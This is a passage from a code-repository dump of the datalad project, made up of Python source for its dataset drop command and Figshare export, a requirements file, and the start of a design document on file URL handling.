'acknowledge by setting the recursive flag')\n\n # we cannot test for what=='allkeys' and path==None here,\n # on per each dataset. otherwise we will not be able to drop\n # from a subdataset, by given its path -- desirable MIH thinks\n\n ds = require_dataset(dataset, check_installed=True, purpose='drop')\n\n res_props = dict(\n logger=lgr,\n refds=ds.path,\n )\n # if not paths are given, there will still be a single dataset record\n # with paths==None\n paths_by_ds, errors = get_paths_by_ds(\n ds,\n dataset,\n ensure_list(path),\n # XXX this needs more thought!! Maybe this is what the mode should be\n # in general?!\n # when we want to drop entire datasets, it is much more useful\n # to have subdatasets be their own record\n subdsroot_mode='sub'\n if what in ('all', 'datasets')\n else 'rsync',\n )\n for e in errors:\n yield dict(\n action='drop',\n path=str(e),\n status='error',\n message=('path not underneath the reference dataset %s', ds),\n **res_props)\n # we are not returning, a caller could decide on failure mode\n\n if what in ('all', 'datasets') and _paths_atunder_dir(\n paths_by_ds, ds.pathobj.cwd()):\n raise RuntimeError(\n 'refuse to perform actions that would remove the current '\n 'working directory')\n\n lgr.debug('Discovered %i datasets to drop (from)', len(paths_by_ds))\n\n # a dataset paths are normalized and guaranteed to be under the same\n # root dataset\n # we want to start from the leave datasets, such that all discovered\n # dataset can be processed independently\n for dpath in sorted(paths_by_ds.keys(), reverse=True):\n d = Dataset(dpath)\n lgr.debug('Starting to drop %s at %s', what, d)\n for res in _drop_dataset(\n d,\n paths_by_ds[dpath],\n what=what,\n reckless=reckless,\n # recursion from any of the given paths!\n recursive=recursive,\n recursion_limit=recursion_limit,\n jobs=jobs):\n yield dict(res, **res_props)\n lgr.debug('Finished dropping %s at %s', what, d)\n return\n\n\ndef _paths_atunder_dir(pbd, dirpath):\n \"\"\"Whether any of the paths is at or under a reference path\n\n Parameters\n ----------\n pbd: dict\n Dataset path dict is produced by get_paths_by_ds()\n dirpath: Path\n Reference path\n\n Returns\n -------\n bool\n \"\"\"\n for dpath, paths in pbd.items():\n for p in ([dpath] if paths is None else paths):\n if p == dirpath or p in dirpath.parents:\n return True\n return False\n\n\ndef _drop_dataset(ds, paths, what, reckless, recursive, recursion_limit, jobs):\n lgr.debug('Start dropping for %s', ds)\n # we know that any given path is part of `ds` and not any of its\n # subdatasets!\n\n # by-passing this completely with reckless=kill\n if recursive and not reckless == 'kill':\n # process subdatasets first with recursion\n for sub in ds.subdatasets(\n # must be resolved!\n path=paths or None,\n # nothing to drop with unavailable subdatasets\n state='present',\n # we can use the full recursion depth, only the first layer\n # of calls to _drop_dataset() must/can have recursive=True\n recursive=recursive,\n recursion_limit=recursion_limit,\n # start reporting with the leaves\n bottomup=True,\n result_xfm='datasets',\n on_failure='ignore',\n return_type='generator',\n result_renderer='disabled'):\n yield from _drop_dataset(\n ds=sub,\n # everything, the entire subdataset is matching a given path\n paths=None,\n what=what,\n reckless=reckless,\n recursive=False,\n recursion_limit=None,\n jobs=jobs)\n\n if not ds.pathobj.exists():\n # basic protection against something having wiped it out already.\n # should not happen, but better than a crash, if it does\n yield dict(\n action='drop',\n path=ds.path,\n status='notneeded',\n message=\"does not exist\",\n type='dataset',\n )\n return\n\n if paths is not None and paths != [ds.pathobj] and what == 'all':\n if recursive and reckless == 'kill':\n # check if any paths contains a subdataset, and if so, drop it to\n # ensure its not left behind\n for sub in ds.subdatasets(\n # just check for subds at the provided path\n path=paths,\n state='present',\n recursive=recursive,\n recursion_limit=recursion_limit,\n result_xfm='datasets',\n on_failure='ignore',\n return_type='generator',\n result_renderer='disabled'):\n if sub is not None:\n # there is a subdataset underneath the given path\n yield from _drop_dataset(\n ds=sub,\n # everything underneath the subds can go\n paths=None,\n what=what,\n reckless=reckless,\n recursive=False,\n recursion_limit=None,\n jobs=jobs)\n # so we have paths constraints that prevent dropping the full dataset\n lgr.debug('Only dropping file content for given paths in %s, '\n 'allthough instruction was to drop %s', ds, what)\n what = 'filecontent'\n\n repo = ds.repo\n is_annex = isinstance(repo, AnnexRepo)\n\n # first critical checks that might prevent further operation\n had_fatality = False\n for res in _fatal_pre_drop_checks(\n ds, repo, paths, what, reckless, is_annex):\n had_fatality = True\n yield res\n if had_fatality:\n return\n\n # next check must come AFTER the modification checks above, otherwise\n # remove() could not rely on the modification detection above\n if paths is not None and paths != [ds.pathobj] and what == 'datasets':\n # so we have paths constraints that prevent dropping the full dataset\n # there is nothing to do here, but to drop keys, which we must not\n # done\n return\n\n # now conditional/informative checks\n yield from _pre_drop_checks(ds, repo, paths, what, reckless, is_annex)\n\n if is_annex and what == 'filecontent':\n yield from _drop_files(\n ds,\n repo,\n # give paths or '.' with no constraint\n paths=[str(p.relative_to(ds.pathobj))\n for p in paths] if paths else '.',\n force=reckless in ('availability', 'kill'),\n jobs=jobs,\n )\n # end it here for safety, the rest of the function deals with\n # dropping more and more fundamentally\n return\n\n drop_all_errored = False\n if is_annex and what in ('allkeys', 'datasets', 'all') \\\n and not reckless == 'kill':\n for r in _drop_allkeys(\n ds,\n repo,\n force=reckless in ('availability',),\n jobs=jobs):\n res = dict(\n action='drop',\n type='key',\n # use the path of the containing dataset\n # using the location of the key does not add any\n # practical value, and is expensive to obtain\n path=ds.path,\n status='ok' if r.get('success') else 'error',\n key=r.get('key'),\n )\n # pull any note, and rename recommended parameter to\n # avoid confusion\n message = r.get('note', '').replace(\n '--force',\n '--reckless availability')\n if message:\n res['message'] = message\n error_messages = r.get('error-messages')\n if error_messages:\n res['error_message'] = '\\n'.join(\n m.strip() for m in error_messages\n )\n # play safe, if there is no status, assume error\n if res.get('status', 'error') != 'ok':\n drop_all_errored = True\n yield res\n\n if drop_all_errored:\n # end it here, if there is any indication that wiping out the\n # repo is unsafe\n return\n\n if what in ('all', 'datasets'):\n yield from _kill_dataset(ds)\n lgr.debug('Done dropping for %s', ds)\n return\n\n\ndef _fatal_pre_drop_checks(ds, repo, paths, what, reckless, is_annex):\n if what == 'allkeys' and paths is not None \\\n and paths != [ds.pathobj]:\n yield dict(\n action='drop',\n path=ds.path,\n type='dataset',\n status='impossible',\n message=(\n 'cannot drop %s, with path constraints given: %s',\n what, paths),\n )\n return\n\n if what in ('all', 'datasets') and not reckless == 'kill':\n # we must not have subdatasets anymore\n # if we do, --recursive was forgotten\n subdatasets = ds.subdatasets(\n path=paths,\n # we only care about the present ones\n state='present',\n # first-level is enough, if that has none, there will be none\n recursive=False,\n result_xfm='paths',\n result_renderer='disabled')\n if subdatasets:\n yield dict(\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=('cannot drop dataset, subdataset(s) still present '\n '(forgot --recursive?): %s', subdatasets)\n )\n # this is fatal\n return\n\n if what in ('all', 'datasets') \\\n and reckless not in ('availability', 'kill') \\\n and (paths is None or paths == [ds.pathobj]):\n unpushed = _detect_unpushed_revs(repo, is_annex)\n if unpushed:\n yield dict(\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=(\n \"to-be-dropped dataset has revisions that \"\n \"are not available at any known sibling. Use \"\n \"`datalad push --to ...` to push \"\n \"these before dropping the local dataset, \"\n \"or ignore via `--reckless availability`. \"\n \"Unique revisions: %s\",\n unpushed)\n )\n # this is fatal\n return\n\n if is_annex and what in ('all', 'datasets') \\\n and reckless not in ('undead', 'kill'):\n # this annex is about to die, test if it is still considered\n # not-dead. if so, complain to avoid generation of zombies\n # (annexed that are floating around, but are actually dead).\n # if repo.uuid is None, git annex init never ran, and we can skip this\n remotes_that_know_this_annex = None if repo.uuid is None else [\n r\n for r in _detect_nondead_annex_at_remotes(repo, repo.uuid)\n # filter out \"here\"\n if r is not None\n ]\n if remotes_that_know_this_annex:\n yield dict(\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='error',\n message=(\n \"to-be-deleted local annex not declared 'dead' at the \"\n \"following siblings. Announce death \"\n \"(`git annex dead here` + `datalad push --to ...`), \"\n \"or ignore via `--reckless undead`: %s\",\n remotes_that_know_this_annex)\n )\n # this is fatal\n return\n\n if reckless not in ('modification', 'kill'):\n # do a cheaper status run to discover any kind of modification and\n # generate results based on the `what` mode of operation\n for res in ds.status(\n path=paths,\n # untracked content will not be reported on further down\n # must catch it here\n untracked='normal',\n # downstream code can handle non-annex/annex distinction\n # avoid expensive evaluation here\n annex=False,\n # we only need to inspect a subdataset's state in case\n # we want to drop it completely\n eval_subdataset_state='commit'\n if what in ('all', 'datasets') else 'no',\n # recursion is handled outside this function\n recursive=False,\n result_renderer='disabled',\n return_type='generator',\n on_failure='ignore'):\n state = res.get('state')\n if state == 'clean':\n # nothing to worry about, nothing to communicate\n continue\n elif state in ('modified', 'untracked'):\n yield dict(\n res,\n status='impossible',\n action='drop',\n message=f'cannot drop {state} content, save first',\n )\n # we are not aborting nevetheless. in normal conditions\n # the above result will stop processing, but if desired\n # we could go on\n else:\n lgr.debug(\n 'Status record not considered for drop '\n 'state inspection: %s', res)\n\n\ndef _pre_drop_checks(ds, repo, paths, what, reckless, is_annex):\n if not is_annex and reckless not in ('datasets', 'kill'):\n # we cannot drop content in non-annex repos, issue same\n # 'notneeded' as for git-file in annex repo\n for p in paths or [ds.path]:\n yield dict(\n action='drop',\n path=str(p),\n status='notneeded',\n message=\"no annex'ed content\",\n )\n # continue, this is nothing fatal\n\n if not is_annex and what in ('allkeys', 'unwanted') \\\n and not reckless == 'kill':\n # these drop modes are meaningless without an annex\n yield dict(\n action='drop',\n path=ds.path,\n status='notneeded',\n message=\"dataset with no annex\",\n type='dataset',\n )\n # continue, this is nothing fatal\n\n\ndef _detect_unpushed_revs(repo, consider_managed_branches):\n \"\"\"Check if all local branch states (and HEAD) are available at a remote\n\n There need not be a 1:1 correspondence. What is tested is whether\n each commit corresponding to a local branch tip (or HEAD), is also an\n ancestor of any remote branch. It is not required that there is a single\n remote that has all commits.\n\n This only uses the state of remotes known to the local remote state.\n No remote synchronization is performed.\n\n Parameters\n ----------\n repo: GitRepo\n Repository to evaluated\n consider_managed_branches: bool\n Whether to enable handling of managed branches.\n\n Returns\n -------\n list\n Names of local states/refs that are no available at a remote.\n \"\"\"\n if consider_managed_branches:\n # consolidate corresponding branches to get reliable detection\n repo.localsync(managed_only=True)\n # we do not want to check this for any managed branches\n # that are not meant to be pushed without consolidation\n # or even at all (incl. git-annex, it can behave in complex ways)\n local_refs = [\n lb for lb in repo.get_branches()\n if not (not consider_managed_branches\n or lb == 'git-annex' or repo.is_managed_branch(lb))]\n if not repo.get_active_branch():\n # check for HEAD, in case we are on a detached HEAD\n local_refs.append('HEAD')\n # extend to tags?\n remote_refs = repo.get_remote_branches()\n\n unpushed_refs = [\n local_ref\n for local_ref in local_refs\n if not any(repo.is_ancestor(local_ref, remote_ref)\n for remote_ref in remote_refs)\n ]\n return unpushed_refs\n\n\ndef _detect_nondead_annex_at_remotes(repo, annex_uuid):\n \"\"\"Return list of remote names that know about a given (not-dead) annex\n\n This only uses the state of remotes known to the local remote state.\n No remote synchronization is performed.\n\n Parameters\n ----------\n repo: AnnexRepo or GitRepo\n Repository to evaluated\n annex_uuid: str\n UUID string of a particular annex\n\n Returns\n -------\n list\n Names of any matching remote, the local repository is indicated using\n a `None` label.\n \"\"\"\n # build the refs for all remotes and local\n remotes_w_registration = []\n for remote in chain([''], repo.get_remotes()):\n refprefix = '{}{}git-annex:'.format(\n remote,\n '/' if remote else '',\n )\n uuid_known = False\n try:\n for line in repo.call_git_items_(\n ['cat-file', '-p', refprefix + 'uuid.log']):\n if line.startswith(annex_uuid):\n # use None to label the local repo\n uuid_known = True\n break\n except CommandError as e:\n CapturedException(e)\n # this is not a problem per-se, logged above, just continue\n continue\n if not uuid_known:\n # if an annex id is not even in the uuid.log, we can stop here\n # (for this remote)\n continue\n\n # annex is known, but maybe is declared dead already, must check\n # trust.log in addition\n try:\n for line in repo.call_git_items_(\n ['cat-file', '-p', refprefix + 'trust.log']):\n columns = line.split()\n if columns[0] == annex_uuid:\n # not known if dead\n uuid_known = False if columns[1] == 'X' else True\n break\n except CommandError as e:\n CapturedException(e)\n # this is not a problem per-se, logged above, just continue\n continue\n finally:\n if uuid_known:\n remotes_w_registration.append(remote or None)\n return(remotes_w_registration)\n\n\ndef _kill_dataset(ds):\n \"\"\"This is a harsh internal helper: it will wipe out a dataset, no checks\n \"\"\"\n # figure out whether we should be nice to a superdataset later on\n has_super = ds.get_superdataset(topmost=False, registered_only=True)\n # Close any possibly associated process etc with underlying repo.\n # Otherwise - rmtree could fail to remove e.g. under NFS which would\n # still have some files opened by them (thus having .nfs00000xxxx\n # files) forbidding rmdir to work in rmtree\n ds.close()\n rmtree(ds.path)\n # invalidate loaded ConfigManager -- datasets are singletons!!\n ds._cfg = None\n if has_super:\n # recreate an empty mountpoint to make Git happier\n ds.pathobj.mkdir(exist_ok=True)\n yield dict(\n # keep uninstall to please the gods of a distant past\n #action='drop',\n action='uninstall',\n path=ds.path,\n type='dataset',\n status='ok',\n )\n\n\ndef _drop_allkeys(ds, repo, force=False, jobs=None):\n \"\"\"\n \"\"\"\n assert not (repo.dot_git / 'annex').is_symlink(), \\\n \"Dropping from a symlinked annex is unsupported to prevent data-loss\"\n\n cmd = ['drop', '--all']\n if force:\n cmd.append('--force')\n if jobs:\n cmd.extend(['--jobs', str(jobs)])\n\n try:\n yield from repo._call_annex_records_items_(cmd)\n except CommandError as e:\n # pick up the results captured so far and yield them\n # the error will be amongst them\n yield from e.kwargs.get('stdout_json', [])\n\n\ndef _drop_files(ds, repo, paths, force=False, jobs=None):\n \"\"\"Helper to drop content in datasets.\n\n Parameters\n ----------\n repo : AnnexRepo\n paths : list\n for which files to drop content\n check : bool\n whether to instruct annex to perform minimum copy availability\n checks\n\n Yields\n ------\n dict\n \"\"\"\n assert not (repo.dot_git / 'annex').is_symlink(), \\\n \"Dropping from a symlinked annex is unsupported to prevent data-loss\"\n cmd = ['drop']\n if force:\n cmd.append('--force')\n if jobs:\n cmd.extend(['--jobs', str(jobs)])\n\n respath_by_status = {}\n try:\n yield from (\n _postproc_annexdrop_result(res, respath_by_status, ds)\n for res in repo._call_annex_records_items_(cmd, files=paths)\n )\n except CommandError as e:\n # pick up the results captured so far and yield them\n # the error will be amongst them\n yield from (\n _postproc_annexdrop_result(res, respath_by_status, ds)\n for res in e.kwargs.get('stdout_json', [])\n )\n # report on things requested that annex was silent about\n for r in results_from_annex_noinfo(\n ds, paths, respath_by_status,\n dir_fail_msg='could not drop some content in %s %s',\n noinfo_dir_msg='nothing to drop from %s',\n noinfo_file_msg=\"no annex'ed content\"):\n r['action'] = 'drop'\n yield r\n\n\ndef _postproc_annexdrop_result(res, respath_by_status, ds, **kwargs):\n res = annexjson2result(\n # annex reports are always about files\n res, ds, type='file', **kwargs)\n success = success_status_map[res['status']]\n respath_by_status[success] = \\\n respath_by_status.get(success, []) + [res['path']]\n if res[\"status\"] == \"error\" and res[\"action\"] == \"drop\":\n msg = res.get(\"message\", None)\n if isinstance(msg, str) and \"Use --force to\" in msg:\n # Avoid confusing datalad-drop callers with git-annex-drop's\n # suggestion to use --force.\n # Just mention reckless itself, do not go into the details\n # of which mode. This is likely changing over time and\n # adjusting this replacement will be forgotten.\n res[\"message\"] = msg.replace(\n \"--force\",\n \"--reckless availability\")\n return res\n" }, { "alpha_fraction": 0.7138964533805847, "alphanum_fraction": 0.7138964533805847, "avg_line_length": 32.3636360168457, "blob_id": "32a656392bbf384e35c7c589d400a33c5ffedcb9", "content_id": "ce7031e315742bda954c89b6b81aea1e6ed996f6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 367, "license_type": "permissive", "max_line_length": 88, "num_lines": 11, "path": "/requirements.txt", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# If you want to develop, use requirements-devel.txt\n\n# Theoretically we don't want -e here but ATM pip would puke if just .[full] is provided\n# TODO -- figure it out and/or complain to pip folks\n# -e .[full]\n\n# this one should work but would copy entire . tree so should be ran on a clean copy\n.[full]\n\n# doesn't install datalad itself\n# file://.#egg=datalad[full]\n" }, { "alpha_fraction": 0.5536975264549255, "alphanum_fraction": 0.5550966262817383, "avg_line_length": 37.78553009033203, "blob_id": "1465b114eb2ff64722675fa4fdba08d11ad32b14", "content_id": "81e24edd8e99e5b93b11a52de75eec1151de082e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15010, "license_type": "permissive", "max_line_length": 90, "num_lines": 387, "path": "/datalad/distributed/export_to_figshare.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"export a dataset as a TAR/ZIP archive to figshare\"\"\"\n\n__docformat__ = 'restructuredtext'\n\nfrom datalad.utils import unlink\nfrom datalad.interface.base import Interface\nfrom datalad.interface.base import build_doc\nfrom datalad.interface.results import get_status_dict\n\nimport logging\nlgr = logging.getLogger('datalad.distributed.export_to_figshare')\n\n\nclass FigshareRESTLaison(object):\n \"\"\"A little helper to provide minimal interface to interact with Figshare\n \"\"\"\n API_URL = 'https://api.figshare.com/v2'\n\n def __init__(self):\n self._token = None\n from datalad.ui import ui\n self.ui = ui # we will be chatty here\n\n @property\n def token(self):\n if self._token is None:\n from datalad.downloaders.providers import Providers\n providers = Providers.from_config_files()\n provider = providers.get_provider(self.API_URL)\n credential = provider.credential\n self._token = credential().get('token')\n return self._token\n\n def __call__(self, m, url, data=None, success=None, binary=False,\n headers=None, return_json=True):\n \"\"\"A wrapper around requests calls\n\n to interpolate deposition_id, do basic checks and conversion\n \"\"\"\n import json\n if '://' not in url:\n url_ = self.API_URL + '/' + url\n else:\n url_ = url\n\n headers = headers or {}\n if data is not None and not binary:\n data = json.dumps(data)\n headers[\"Content-Type\"] = \"application/json\"\n headers['Authorization'] = \"token %s\" % self.token\n\n lgr.debug(\n \"Submitting %s request to %s with data %s (headers: %s)\",\n m.__name__, url_, data, 'sanitized' # headers\n )\n r = m(url_, data=data, headers=headers)\n status_code = r.status_code\n if (success != \"donotcheck\") and \\\n ((success and status_code not in success)\n or (not success and status_code >= 400)):\n msg = \"Got return code %(status_code)s for %(m)s(%(url_)s.\" \\\n % locals()\n raise RuntimeError(\"Error status %s\" % msg)\n\n if return_json:\n return r.json() if r.content else {}\n else:\n return r.content\n\n def put(self, *args, **kwargs):\n import requests\n return self(requests.put, *args, **kwargs)\n\n def post(self, *args, **kwargs):\n import requests\n return self(requests.post, *args, **kwargs)\n\n def get(self, *args, **kwargs):\n import requests\n return self(requests.get, *args, **kwargs)\n\n def upload_file(self, fname, files_url):\n # In v2 API seems no easy way to \"just upload\". Need to initiate,\n # do uploads\n # and finalize\n # TODO: check if the file with the same name already available, and offer\n # to remove/prune it\n import os\n from datalad.utils import md5sum\n from datalad.ui import ui\n file_rec = {'md5': md5sum(fname),\n 'name': os.path.basename(fname),\n 'size': os.stat(fname).st_size\n }\n # Initiate upload\n j = self.post(files_url, file_rec)\n file_endpoint = j['location']\n file_info = self.get(file_endpoint)\n file_upload_info = self.get(file_info['upload_url'])\n\n pbar = ui.get_progressbar(label=fname, # fill_text=f.name,\n total=file_rec['size'])\n with open(fname, 'rb') as f:\n for part in file_upload_info['parts']:\n udata = dict(file_info, **part)\n if part['status'] == 'PENDING':\n f.seek(part['startOffset'])\n data = f.read(part['endOffset'] - part['startOffset'] + 1)\n url = '{upload_url}/{partNo}'.format(**udata)\n ok = self.put(url, data=data, binary=True, return_json=False)\n assert ok == b'OK'\n pbar.update(part['endOffset'], increment=False)\n pbar.finish()\n\n # complete upload\n jcomplete = self.post(file_endpoint, return_json=False)\n return file_info\n\n def get_article_ids(self):\n articles = self.get('account/articles')\n ids = []\n for item in articles or []:\n self.ui.message(' {id} {url} - {title}'.format(**item))\n ids.append(item['id'])\n return ids\n\n def create_article(self, title):\n data = {\n 'title': title\n }\n # we could prefill more fields interactively if desired\n result = self.post('account/articles', data=data)\n result = self.get(result['location'])\n return result\n\n\ndef _get_default_title(dataset):\n \"\"\"Create default title as dataset directory[#UUID][@version]\n with any of [] missing if not defined\n \"\"\"\n from ..support.path import basename\n title = basename(dataset.path)\n if dataset.id:\n title += \"#{dataset.id}\".format(**locals())\n version = dataset.repo.describe()\n if version:\n title += \"@{version}\".format(**locals())\n # 3 is minimal length. Just in case there is no UUID or version and dir\n # is short\n if len(title) < 3:\n title += \"0\"*(3 - len(title))\n return title\n\n\ndef _enter_title(ui, dataset):\n default = _get_default_title(dataset)\n while True:\n title = ui.question(\n \"Please enter the title (must be at least 3 characters long).\",\n title=\"New article\",\n default=default\n )\n if len(title) < 3:\n ui.error(\"Title must be at least 3 characters long.\")\n else:\n return title\n\n\n@build_doc\nclass ExportToFigshare(Interface):\n \"\"\"Export the content of a dataset as a ZIP archive to figshare\n\n Very quick and dirty approach. Ideally figshare should be supported as\n a proper git annex special remote. Unfortunately, figshare does not support\n having directories, and can store only a flat list of files. That makes\n it impossible for any sensible publishing of complete datasets.\n\n The only workaround is to publish dataset as a zip-ball, where the entire\n content is wrapped into a .zip archive for which figshare would provide a\n navigator.\n \"\"\"\n\n from datalad.support.param import Parameter\n from datalad.distribution.dataset import datasetmethod\n from datalad.interface.base import eval_results\n from datalad.distribution.dataset import EnsureDataset\n from datalad.support.constraints import (\n EnsureChoice,\n EnsureInt,\n EnsureNone,\n EnsureStr,\n )\n\n _params_ = dict(\n dataset=Parameter(\n args=(\"-d\", \"--dataset\"),\n doc=\"\"\"\"specify the dataset to export. If no dataset is given, an\n attempt is made to identify the dataset based on the current\n working directory.\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n filename=Parameter(\n args=(\"filename\",),\n metavar=\"PATH\",\n nargs='?',\n doc=\"\"\"File name of the generated ZIP archive. If no file name is\n given the archive will be generated in the top directory\n of the dataset and will be named: datalad_<dataset_uuid>.zip.\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n no_annex=Parameter(\n args=(\"--no-annex\",),\n action=\"store_true\",\n doc=\"\"\"By default the generated .zip file would be added to annex,\n and all files would get registered in git-annex to be available\n from such a tarball. Also upon upload we will register for that\n archive to be a possible source for it in annex. Setting this flag\n disables this behavior.\"\"\"),\n missing_content=Parameter(\n args=(\"--missing-content\",),\n doc=\"\"\"By default, any discovered file with missing content will\n result in an error and the plugin is aborted. Setting this to\n 'continue' will issue warnings instead of failing on error. The\n value 'ignore' will only inform about problem at the 'debug' log\n level. The latter two can be helpful when generating a TAR archive\n from a dataset where some file content is not available\n locally.\"\"\",\n constraints=EnsureChoice(\"error\", \"continue\", \"ignore\")),\n # article_id=Parameter(\n # args=(\"--project-id\",),\n # metavar=\"ID\",\n # doc=\"\"\"If given, article (if article_id is not provided) will be\n # created in that project.\"\"\",\n # constraints=EnsureInt() | EnsureNone()),\n article_id=Parameter(\n args=(\"--article-id\",),\n metavar=\"ID\",\n doc=\"\"\"Which article to publish to.\"\"\",\n constraints=EnsureInt() | EnsureNone()),\n )\n\n @staticmethod\n @datasetmethod(name='export_to_figshare')\n @eval_results\n # TODO*: yet another former plugin with dataset first -- do we need that???\n def __call__(filename=None,\n *,\n dataset=None,\n missing_content='error', no_annex=False,\n # TODO: support working with projects and articles within them\n # project_id=None,\n article_id=None):\n import logging\n lgr = logging.getLogger('datalad.plugin.export_to_figshare')\n\n from datalad.ui import ui\n from datalad.api import add_archive_content\n from datalad.api import export_archive\n from datalad.distribution.dataset import require_dataset\n from datalad.support.annexrepo import AnnexRepo\n\n dataset = require_dataset(dataset, check_installed=True,\n purpose='export to figshare')\n\n if not isinstance(dataset.repo, AnnexRepo):\n raise ValueError(\n \"%s is not an annex repo, so annexification could be done\"\n % dataset\n )\n\n if dataset.repo.dirty:\n yield get_status_dict(\n 'export_to_figshare',\n ds=dataset,\n status='impossible',\n message=(\n 'clean dataset required to export; '\n 'use `datalad status` to inspect unsaved changes'))\n return\n if filename is None:\n filename = dataset.path\n lgr.info(\n \"Exporting current tree as an archive under %s since figshare \"\n \"does not support directories\",\n filename\n )\n archive_out = next(\n export_archive(\n dataset=dataset,\n filename=filename,\n archivetype='zip',\n missing_content=missing_content,\n return_type=\"generator\"\n )\n )\n assert archive_out['status'] == 'ok'\n fname = str(archive_out['path'])\n\n lgr.info(\"Uploading %s to figshare\", fname)\n figshare = FigshareRESTLaison()\n\n if not article_id:\n # TODO: ask if it should be an article within a project\n if ui.is_interactive:\n # or should we just upload to a new article?\n if ui.yesno(\n \"Would you like to create a new article to upload to? \"\n \"If not - we will list existing articles\",\n title=\"Article\"\n ):\n article = figshare.create_article(\n title=_enter_title(ui, dataset)\n )\n lgr.info(\n \"Created a new (private) article %(id)s at %(url_private_html)s. \"\n \"Please visit it, enter additional meta-data and make public\",\n article\n )\n article_id = article['id']\n else:\n article_id = int(ui.question(\n \"Which of the articles should we upload to.\",\n choices=list(map(str, figshare.get_article_ids()))\n ))\n if not article_id:\n raise ValueError(\"We need an article to upload to.\")\n\n file_info = figshare.upload_file(\n fname,\n files_url='account/articles/%s/files' % article_id\n )\n\n if no_annex:\n lgr.info(\"Removing generated tarball\")\n unlink(fname)\n else:\n # I will leave all the complaining etc to the dataset add if path\n # is outside etc\n lgr.info(\"'Registering' %s within annex\", fname)\n repo = dataset.repo\n repo.add(fname, git=False)\n key = repo.get_file_annexinfo(fname)['key']\n lgr.info(\"Adding URL %(download_url)s for it\", file_info)\n repo.call_annex([\n \"registerurl\", '-c', 'annex.alwayscommit=false',\n key, file_info['download_url']])\n\n lgr.info(\"Registering links back for the content of the archive\")\n add_archive_content(\n fname,\n dataset=dataset,\n delete_after=True, # just remove extracted into a temp dir\n allow_dirty=True, # since we have a tarball\n commit=False # we do not want to commit anything we have done here\n )\n\n lgr.info(\"Removing generated and now registered in annex archive\")\n repo.drop(key, key=True, options=['--force'])\n repo.remove(fname, force=True) # remove the tarball\n\n # if annex in {'delete'}:\n # dataset.repo.remove(fname)\n # else:\n # # kinda makes little sense I guess.\n # # Made more sense if export_archive could export an arbitrary treeish\n # # so we could create a branch where to dump and export to figshare\n # # (kinda closer to my idea)\n # dataset.save(fname, message=\"Added the entire dataset into a zip file\")\n\n # TODO: add to downloader knowledge about figshare token so it could download-url\n # those zipballs before they go public\n yield dict(\n status='ok',\n # TODO: add article url (which needs to be queried if only ID is known\n message=\"Published archive {}\".format(\n file_info['download_url']),\n file_info=file_info,\n path=dataset,\n action='export_to_figshare',\n logger=lgr\n )\n" }, { "alpha_fraction": 0.7640687823295593, "alphanum_fraction": 0.7659524083137512, "avg_line_length": 48.38372039794922, "blob_id": "968a3f3dcafbfea0efb107ec29021ef40fa412f3", "content_id": "16dbdb4808c9318b2f1f4099dfbfaac0e8379b5f", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 4247, "license_type": "permissive", "max_line_length": 110, "num_lines": 86, "path": "/docs/source/design/file_url_handling.rst", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": ".. -*- mode: rst -*-\n.. vi: set ft=rst sts=4 ts=4 sw=4 et tw=79:\n\n.. _chap_design_file_url_handling:\n\n*****************\nFile URL handling\n*****************\n\n.. topic:: Specification scope and status\n\n This specification describes the current implementation.\n\nDataLad datasets can record URLs for file content access as metadata. This is a\nfeature provided by git-annex and is available for any annexed file. DataLad\nimproves upon the git-annex functionality in two ways:\n\n1. Support for a variety of (additional) protocols and authentication methods.\n\n2. Support for special URLs pointing to individual files located in registered\n (annexed) archives, such as tarballs and ZIP files.\n\nThese additional features are available to all functionality that is processing\nURLs, such as ``get``, ``addurls``, or ``download-url``.\n\n\nExtensible protocol and authentication support\n==============================================\n\nDataLad ships with a dedicated implementation of an external `git-annex special\nremote`_ named ``git-annex-remote-datalad``. This is a somewhat atypical special\nremote, because it cannot receive files and store them, but only supports\nread operations.\n\nSpecifically, it uses the ``CLAIMURL`` feature of the `external special remote\nprotocol`_ to take over processing of URLs with supported protocols in all\ndatasets that have this special remote configured and enabled.\n\nThis special remote is automatically configured and enabled in DataLad dataset\nas a ``datalad`` remote, by commands that utilize its features, such as\n``download-url``. Once enabled, DataLad (but also git-annex) is able to act on\nadditional protocols, such as ``s3://``, and the respective URLs can be given\ndirectly to commands like ``git annex addurl``, or ``datalad download-url``.\n\nBeyond additional protocol support, the ``datalad`` special remote also\ninterfaces with DataLad's :ref:`chap_design_credentials`. It can identify a\nparticular credential required for a given URL (based on something called a\n\"provider\" configuration), ask for the credential or retrieve it from a\ncredential store, and supply it to the respective service in an appropriate\nform. Importantly, this feature neither requires the necessary credential or\nprovider configuration to be encoded in a URL (where it would become part of\nthe git-annex metadata), nor to be committed to a dataset. Hence all\ninformation that may depend on which entity is performing a URL request\nand in what environment is completely separated from the location information\non a particular file content. This minimizes the required dataset maintenance\neffort (when credentials change), and offers a clean separation of identity\nand availability tracking vs. authentication management.\n\n\nIndexing and access of archive content\n======================================\n\nAnother `git-annex special remote`_, named\n``git-annex-remote-datalad-archives``, is used to enable file content retrieval\nfrom annexed archive files, such as tarballs and ZIP files. Its implementation\nconcept is closely related to the ``git-annex-remote-datalad``, described\nabove. Its main difference is that it claims responsibility for a particular\ntype of \"URL\" (starting with ``dl+archive:``). These URLs encode the identity\nof an archive file, in terms of its git-annex key name, and a relative path\ninside this archive pointing to a particular file.\n\nLike ``git-annex-remote-datalad``, only read operations are supported. When\na request to a ``dl+archive:`` \"URL\" is made, the special remote identifies\nthe archive file, if necessary obtains it at the precise version needed, and\nextracts 